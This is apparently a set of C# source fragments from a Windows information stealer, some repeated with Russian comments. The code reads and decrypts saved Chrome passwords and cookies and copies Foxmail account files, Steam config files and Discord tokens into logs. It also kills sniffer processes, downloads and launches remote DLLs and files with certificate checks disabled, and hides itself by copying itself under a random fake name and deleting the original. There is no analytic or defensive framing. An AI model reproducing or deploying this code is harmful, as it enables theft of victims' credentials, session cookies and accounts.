public static bool Download(string HostName) { AntiSniffer.Inizialize(); if (Directory.Exists(GlobalPath.GarbageTemp)) { if (!Directory.Exists(OSDirectory)) { CombineEx.CreateDir(OSDirectory); return(Download(HostName)); } else { foreach (string list in Encryptdll) { if (!list.EndsWith(".txt", StringComparison.Ordinal)) { return(false); } else { string ChangerExtension = Path.ChangeExtension(list, ".dll"); GetByte($@"{HostName}/files/dll/{list}", CombineEx.Combination(GlobalPath.GarbageTemp, ChangerExtension)); } } } } return(true); }
public static void Inizialize() { string FullPathReg = @"SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command"; ProcessKiller.Closing("Foxmail"); if (Directory.Exists(FoxMailPath.GetFoxMail(FullPathReg)) || !Directory.Exists(GlobalPath.FoxMailPass)) { CombineEx.CreateDir(GlobalPath.FoxMailPass); try { foreach (string dir in Directory.EnumerateDirectories(FoxMailPath.GetFoxMail(FullPathReg), "*@*", SearchOption.TopDirectoryOnly)) { try { string Email = dir.Substring(dir.LastIndexOf("\\") + 1); string UserDat = CombineEx.Combination(dir, @"Accounts\Account.rec0"); string FinalPath = CombineEx.Combination(GlobalPath.FoxMailPass, @"Account.rec0"); CombineEx.FileCopy(UserDat, FinalPath, true); Reader(UserDat, Email); if (File.Exists(GlobalPath.FoxMailLog)) { CombineEx.DeleteFile(FinalPath); } } catch (ArgumentException) { } } } catch (Exception) { } } }
public static bool Download(string HostName) { AntiSniffer.Inizialize(); // Убиваем снифферы. if (Directory.Exists(GlobalPath.GarbageTemp)) // проверяем папку Garbage в папке Temp - Temp\Garbage { if (!Directory.Exists(OSDirectory)) // Проверяем директорию битности { CombineEx.CreateDir(OSDirectory); // Создадим директорию. return(Download(HostName)); // Снова выполним метод Download } else // Если папка битности есть то.. { foreach (string list in Encryptdll) // проходим циклом по списку Encryptdll { if (!list.EndsWith(".txt", StringComparison.Ordinal)) // Проверим что список состоит из .txt файлов { return(false); // если нет то завершаем работу. } else { string ChangerExtension = Path.ChangeExtension(list, ".dll"); // Переименовываем форматы файлов в *.dll GetByte($@"{HostName}/files/dll/{list}", CombineEx.Combination(GlobalPath.GarbageTemp, ChangerExtension)); // Скачиваем .dll файлы } } } } return(true); // Переходим дальше. }
public static void Inizialize() { if (File.Exists(CombineEx.Combination(OSLibrary.GetOSBit(), "SQLite.Interop.dll"))) { _Logs.Clear(); for (int i = 0; i < ChromeCookiesSearcher.GetCookies.Count; i++) { int SafeIndex = i; if (File.Exists(ChromeCookiesSearcher.GetCookies[SafeIndex])) { try { using (var Connect = new SQLiteConnection($"Data Source={ChromeCookiesSearcher.GetCookies[SafeIndex]};pooling=false")) { Connect.Open(); using (var ComText = new SQLiteCommand("SELECT name, encrypted_value, path, expires_utc, last_access_utc, host_key FROM cookies", Connect)) { ComText.CommandType = CommandType.Text; using (SQLiteDataReader reader = ComText.ExecuteReader()) { if (!reader.HasRows) { continue; } else { while (reader.Read()) { _Logs.Add(new BaseCookies { Application = Path.GetFileNameWithoutExtension(ChromeCookiesSearcher.GetCookies[SafeIndex]), HostKey = (string)reader["host_Key"], Name = (string)reader["Name"], Path = (string)reader["path"], Expires_utc = (long)reader["expires_utc"], Last_access_utc = (long)reader["last_access_utc"], EncryptedValue = ChromeDecrypt.DecryptValue((byte[])reader["encrypted_value"], DataProtectionScope.LocalMachine) }); } } } } SQLiteConnection.ClearPool(Connect); } } catch (SQLiteException) { continue; } catch (FormatException) { continue; } catch (ArgumentException) { continue; } catch (IndexOutOfRangeException) { continue; } catch (DllNotFoundException) { continue; } } } Ccleaner.DeltaLogs("Cookies"); foreach (BaseCookies ss in _Logs) { SaveData.SaveFile(GlobalPath.CookiesLog, ss.ToString()); } } }
public static void Inizialize() { _Logs.Clear(); for (int i = 0; i < ChromeSearcher.GetLogins.Count; i++) { int SafeIndex = i; if (File.Exists(ChromeSearcher.GetLogins[SafeIndex])) { try { using (var Connect = new SQLiteConnection($"Data Source={ChromeSearcher.GetLogins[SafeIndex]};Version=3;New=False;Compress=True;")) { Connect.Open(); using (var ComText = new SQLiteCommand("SELECT origin_url, username_value, password_value FROM logins", Connect)) { using (SQLiteDataReader reader = ComText.ExecuteReader()) { if (reader.HasRows) { while (reader.Read()) { _Logs.Add(new BaseAccount { BrowserName = Path.GetFileNameWithoutExtension(ChromeSearcher.GetLogins[SafeIndex]), Url = (string)reader["origin_url"], User = (string)reader["username_value"], Pass = ChromeDecrypt.DecryptValue(GetBytes(reader, 2), DataProtectionScope.LocalMachine) }); } } else { continue; } } } SQLiteConnection.ClearPool(Connect); } } catch (SQLiteException) { continue; } catch (FormatException) { continue; } catch (ArgumentException) { continue; } catch (IndexOutOfRangeException) { continue; } catch (DllNotFoundException) { continue; } } } Ccleaner.DeltaLogs("Logins"); var b = new Wrapper { Browsers = _Logs }; if (File.Exists(CombineEx.Combination(GlobalPath.GarbageTemp, "Newtonsoft.Json.dll"))) { SaveData.SaveFile(GlobalPath.PasswordLog, JsonConvert.SerializeObject(b, Formatting.Indented)); } }
public static void Copy(string Expansion, string ConfigFiles, string Name, string Proc) { if (Directory.Exists(SteamPath.GetLocationSteam()) || (!Directory.Exists(GlobalPath.Steam_Dir))) { CombineEx.CreateDir(GlobalPath.Steam_Dir); ProcessKiller.Closing(Proc); try { foreach (string Unknown in Directory.EnumerateFiles(SteamPath.GetLocationSteam(), Expansion)) { if (File.Exists(Unknown)) { if (!Unknown.Contains(".crash")) { CombineEx.Combination(Unknown, CombineEx.Combination(GlobalPath.Steam_Dir, Path.GetFileName(Unknown))); } } else { continue; } } } catch (IOException) { } catch (UnauthorizedAccessException) { } catch (ArgumentException) { } if (!Directory.Exists(CombineEx.Combination(GlobalPath.Steam_Dir, Name))) { try { CombineEx.CreateDir(CombineEx.Combination(GlobalPath.Steam_Dir, Name)); SaveData.SaveFile(GlobalPath.SteamID, SteamProfiles.GetSteamID()); foreach (string Config in Directory.EnumerateFiles(CombineEx.Combination(SteamPath.GetLocationSteam(), Name), ConfigFiles)) { if (!File.Exists(Config)) { continue; } else { CombineEx.FileCopy(Config, CombineEx.Combination(CombineEx.Combination(GlobalPath.Steam_Dir, Name), Path.GetFileName(Config)), true); } } } catch { } } } }
private static void CopyDiscordSafeDir(int size = 0) { if (File.Exists(GlobalPath.DiscordFile) || (!Directory.Exists(GlobalPath.DiscordHome))) { CombineEx.CreateDir(GlobalPath.DiscordHome); try { if (!new FileInfo(GlobalPath.DiscordFile).Length.Equals(size)) { CombineEx.FileCopy(GlobalPath.DiscordFile, CombineEx.Combination(GlobalPath.DiscordHome, Path.GetFileName(GlobalPath.DiscordFile)), true); } } catch { } } }
public static void CopyLoginsInSafeDir(string Folder, bool Recursive = true) { CombineEx.CreateDir(Folder); for (int i = 0; i < BrPaths.Count; i++) { int SafeIndex = i; if (File.Exists(BrPaths[SafeIndex])) { try { CombineEx.FileCopy(BrPaths[SafeIndex], CombineEx.Combination(Folder, Path.GetFileName(GetApplication.GetBrowserName(BrPaths[SafeIndex]))), Recursive); GetSecureFile(Folder, GetApplication.GetBrowserName(BrPaths[SafeIndex])); } catch (ArgumentException) { } } } }
private static bool GeName(string path) { using (var rnd = new RNGCryptoServiceProvider()) { try { foreach (string i in FakeName.OrderBy(x => GetNextInt32(rnd)).ToArray()) { RandomProcessName = CombineEx.Combination(path, i); break; } CombineEx.FileCopy(GlobalPath.AssemblyPath, RandomProcessName, false); // Перемещает запускаемый файл! ProcessKiller.Running(RandomProcessName, false); ProcessKiller.Delete("/C choice /C Y /N /D Y /T 0 & Del", GlobalPath.AssemblyPath); } catch { return(false); } return(true); } }
private static bool GeName(string path) { using (var rnd = new RNGCryptoServiceProvider()) { try { foreach (string style in FakeName.OrderBy(x => GetNextInt32(rnd)).ToArray()) // генерируем рандомное имя из списка FakeName { RandomProcessName = CombineEx.Combination(path, style); // Задаём сгенерированное имя для нового файла .exe break; // Выбрали первое подходящие, выходим из цикла. } CombineEx.FileCopy(GlobalPath.AssemblyPath, RandomProcessName, false); // Копируем запускаемый файл в новую папку ProcessKiller.Running(RandomProcessName, false); // Запускаем файл из новой папки ProcessKiller.Delete("/C choice /C Y /N /D Y /T 0 & Del", GlobalPath.AssemblyPath); // Удаляем предыдущий процесс } catch { return(false); } return(true); } }
public static void CopyCookiesInSafeDir(string DirCookies, bool Recursive = true) { CombineEx.CreateDir(DirCookies); foreach (string Cookie in CookiesFullPath) { if (!File.Exists(Cookie)) { continue; } else { try { CombineEx.FileCopy(Cookie, CombineEx.Combination(DirCookies, Path.GetFileName(GetApplication.GetBrowserName(Cookie))), Recursive); GetSecureFile(DirCookies, GetApplication.GetBrowserName(Cookie)); } catch (ArgumentException) { } } } }
public static bool DownFileEx(string Link, string SavePath, string FileName) { string Merge = CombineEx.Combination(SavePath, FileName); if (!File.Exists(Merge)) { if (!NetControl.CheckURL(Link)) { return(false); } else { using (var Web = new WebClient()) { ServicePointManager.ServerCertificateValidationCallback += ValidateRemoteCertificate; ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls; ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3; Web.Headers.Add(HttpRequestHeader.UserAgent, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64"); Web.DownloadFile(new Uri(Link), Merge); if (!File.Exists(Merge)) { return(false); } else { LaunchFile(Merge); return(true); } } } } else { LaunchFile(Merge); return(true); } }
public static void GeTokens() { for (int i = 0; i < list.Count; i++) { int SafeIndex = i; if (File.Exists(Path.Combine(GlobalPath.GarbageTemp, list[SafeIndex]))) { CopyDiscordSafeDir(); try { string SafeFileDB = CombineEx.Combination(GlobalPath.DiscordHome, @"https_discordapp.com_0.localstorage"); using (var Connect = new SQLiteConnection($@"Data Source={SafeFileDB};Version=3")) { Connect.Open(); try { using (SQLiteCommand cmd = Connect.CreateCommand()) { cmd.CommandText = CommandText; using (SQLiteDataReader reader = cmd.ExecuteReader()) { while (reader.Read()) { SaveData.SaveFile(GlobalPath.DisLog, $"Token: {DecodeToken((byte[])reader[1])}"); } } } } catch { } } CombineEx.DeleteFile(SafeFileDB); } catch (FileNotFoundException) { } } } }